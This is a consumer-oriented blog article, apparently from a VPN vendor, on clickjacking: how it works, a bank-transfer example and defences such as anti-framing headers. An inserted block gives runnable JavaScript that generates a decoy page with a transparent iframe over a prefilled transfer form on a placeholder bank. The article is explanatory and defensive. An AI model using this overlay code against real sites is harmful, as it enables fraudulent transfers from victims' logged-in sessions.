Sneaky clickjacking attacks and their prevention

Clickjacking is one of the trickiest and craftiest cyber attacks these days. Imagine you visit a website and see an appealing “Free iPhone – limited time offer!” ad. Tempted by the offer, you immediately click on the big button to claim your reward. Instead of getting a new smartphone for free, hackers empty your bank account. Easy as that, you’ve fallen victim to a clickjacking attack. Luckily, there are effective preventative measures to defend yourself.

What is clickjacking?

Clickjacking (or User Interface (UI) redressing) is an attack that tricks users into clicking on web elements they cannot see. The attacker loads the targeted website, or just one of its buttons, inside an invisible iframe and lays it over a decoy page that looks perfectly legitimate. When you click a button on the seemingly innocent page, the click actually lands on the transparent frame above it and triggers an action on the real site, in your own logged-in session. In this deceptive manner, the attack tricks users into downloading malware, revealing credentials and other sensitive information, or unwittingly authorizing a wire transfer.

Example of a clickjacking attack

  1. The attacker builds an attractive website or form that offers you a free iPhone or a trip to the Bahamas.
  2. The attacker prefills the bank's transfer form with their own account details through the URL's query parameters (this only works against a bank whose transfer page accepts such parameters).
  3. The attack relies on you being logged into your online banking in the same browser, so that the bank page loads with your session when it is embedded.
  4. The prefilled transfer page is loaded into a transparent iframe laid over the "Win a trip to the Bahamas" page. The attacker positions it so that the bank's hidden "Donate all your money" confirmation button sits precisely under the "Receive gift" button you can see.
  5. You visit the page and, excited to win the prize, click the button.
  6. In reality, you clicked the invisible frame and confirmed the "Donate all your money" transfer in your own banking session. Your funds end up with the attacker.
  7. To the bank, the transfer looks entirely legitimate: it was submitted from your browser while you were properly logged in, which is what makes a clickjacking attack so hard to detect and to dispute afterwards.
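Steps 2 to 6 as working code, added here as an illustration and not part of the original article: the function below assembles the decoy page the attacker serves. The bank URL (https://bank.example/transfer), the query parameters `to`, `amount` and `memo` that prefill its form, and the pixel offsets are all hypothetical; a bank that accepts prefilled transfers from the URL and allows itself to be framed is assumed, not a real one.

```javascript
// Added illustration of the decoy page from the example above; nothing here
// is from the original article. bank.example, the parameter names and the
// pixel offsets are hypothetical. Run with: node clickjack_decoy.js
const TARGET = "https://bank.example/transfer"; // hypothetical bank transfer form

// Step 2: the attacker's account details travel in the URL, so the bank's
// form is already filled in when it loads inside the frame.
function buildTargetUrl(params) {
  const url = new URL(TARGET);
  for (const [name, value] of Object.entries(params)) url.searchParams.set(name, value);
  return url.toString();
}

// Minimal escaping so the URL can be placed inside an HTML attribute.
function attr(value) {
  return value.replace(/&/g, "&amp;").replace(/"/g, "&quot;");
}

// Step 4: the bank page sits in an iframe that is fully transparent
// (opacity:0) but still receives clicks, stacked above the decoy (z-index)
// and shifted by `offset` so the bank's confirmation button lands exactly
// under the visible "Receive gift" button.
function buildDecoyPage(targetUrl, offset) {
  return `<!doctype html>
<html><head><meta charset="utf-8"><title>Win a trip to the Bahamas!</title>
<style>
  #decoy  { position:absolute; top:120px; left:100px; font-size:24px; }
  #victim { position:absolute; top:${offset.top}px; left:${offset.left}px;
            width:800px; height:600px; opacity:0; z-index:2; border:0; }
</style></head>
<body>
  <h1>Congratulations, you were selected!</h1>
  <button id="decoy">Receive gift</button>
  <!-- Steps 3 and 6: the frame loads with the victim's own bank session,
       so the hijacked click is a legitimate, authenticated confirmation. -->
  <iframe id="victim" src="${attr(targetUrl)}"></iframe>
</body></html>`;
}

// Constructed sample: a made-up payee, not a real account.
const sampleUrl = buildTargetUrl({ to: "ATTACKER-IBAN", amount: "10000", memo: "gift" });
const samplePage = buildDecoyPage(sampleUrl, { top: -300, left: -250 });
console.log(samplePage);
```

Saved to a file and opened in a browser, the page shows only the decoy (the frame is invisible and, with no real bank behind it, empty). The whole attack is the CSS: an opaque-looking page with a transparent, click-receiving frame on top, which is exactly what anti-framing response headers such as X-Frame-Options exist to deny.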

Mitigating clickjacking attacks

Since most clickjacking attacks rely on embedding the targeted website in an iframe, the primary defenses are server-side configurations: the site tells browsers not to allow framing by sending the X-Frame-Options header (DENY or SAMEORIGIN) and, for modern browsers, a Content-Security-Policy header with a frame-ancestors directive. Marking session cookies SameSite=Lax or Strict helps as well, because the browser then does not attach them when the page is loaded in a cross-site frame, so the framed page is not logged in. These mechanisms only work because browsers comply with the web standards that define them, and only for sites that actually send them.

Still, mitigation doesn't end with server-side protection. In the end, most clickjacking attacks reach their victims through social engineering, so there is plenty you can do yourself:

  1. Download browser extensions

Browser extensions can detect if the current page window is authentic or “redressed.” Also, these extensions can prevent you from clicking on invisible frames and intercept potential attacks against you. You can try the NoClickjack extension for Chrome, Firefox, Safari, Opera, and Microsoft Edge, or NoScript for Chrome and Firefox.

  2. Learn to recognize social engineering scams

Phishing, vishing, whaling, pretexting, baiting, and clickjacking are only a few of the many social engineering techniques. By educating yourself about the fundamental principles of prevalent threats, you can quickly recognize them. Always use common sense and remember: if it sounds too good to be true, then it probably is.

  3. Use a VPN

Install a VPN to encrypt your traffic so that cybercriminals on the same network can't intercept and steal your private information. A VPN doesn't stop a clickjacking overlay, which happens inside your browser, and falling for one is ultimately a result of human error, but it does preserve your digital privacy. Atlas VPN's SafeBrowse feature additionally prevents you from entering known malicious websites and blocks suspicious redirects, annoying pop-ups, and ads, which cuts off many of the pages that host such scams in the first place.


John C.


Tags: clickjacking